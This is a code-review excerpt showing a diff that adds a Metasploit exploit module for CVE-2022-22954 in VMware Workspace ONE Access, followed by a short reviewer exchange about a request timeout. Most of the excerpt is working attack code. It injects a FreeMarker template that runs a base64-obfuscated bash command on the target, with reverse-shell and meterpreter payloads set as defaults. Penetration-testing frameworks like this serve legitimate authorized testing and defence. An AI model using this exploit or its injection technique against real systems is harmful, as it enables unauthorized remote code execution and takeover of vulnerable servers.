modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb

```diff
@@ -0,0 +1,139 @@
+          'wvu' # Exploit and independent analysis
+        ],
+        'References' => [
+          ['CVE', '2022-22954'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],
+          ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],
+          ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],
+          ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']
+          # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433
+        ],
+        'DisclosureDate' => '2022-04-06',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    ret = execute_command("echo #{token = rand_text_alphanumeric(8..16)}")
+
+    return CheckCode::Unknown unless ret
+    return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/)
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    bash_cmd = "bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}"
+
+    vprint_status("Executing command: #{bash_cmd}")
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, ssti_uri),
+      'vhost' => rand_text_alphanumeric(8..16),
+      'vars_get' => {
+        %w[code error].sample => rand_text_alphanumeric(8..16),
+        # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html
+        ssti_param => %(${"freemarker.template.utility.Execute"?new()("#{bash_cmd}")})
+      }
+    }, 3.5)
```

Comment:
This is a pretty specific timeout value. Is this just the ideal value for some reason? I see in the check method you're able to get the token out, so it's not necessary to have a timeout used for some kind of sleep.

I thought I'd ask, but I'll test this with the default value. Everything else looks good to me :+1: .

Reply:
Ah I see that some of the payloads are not returning immediately, so this timeout makes the module more responsive.

I'll mark this as resolved and get it landed. Thanks!

Reply:
Hah, it's somewhat ideal but also a Metasploit inside joke that's probably forgotten now. I usually make it configurable for long-running commands returning output, but that's not the case here. I'm glad you asked!

Reply:
Properly handled in #16525.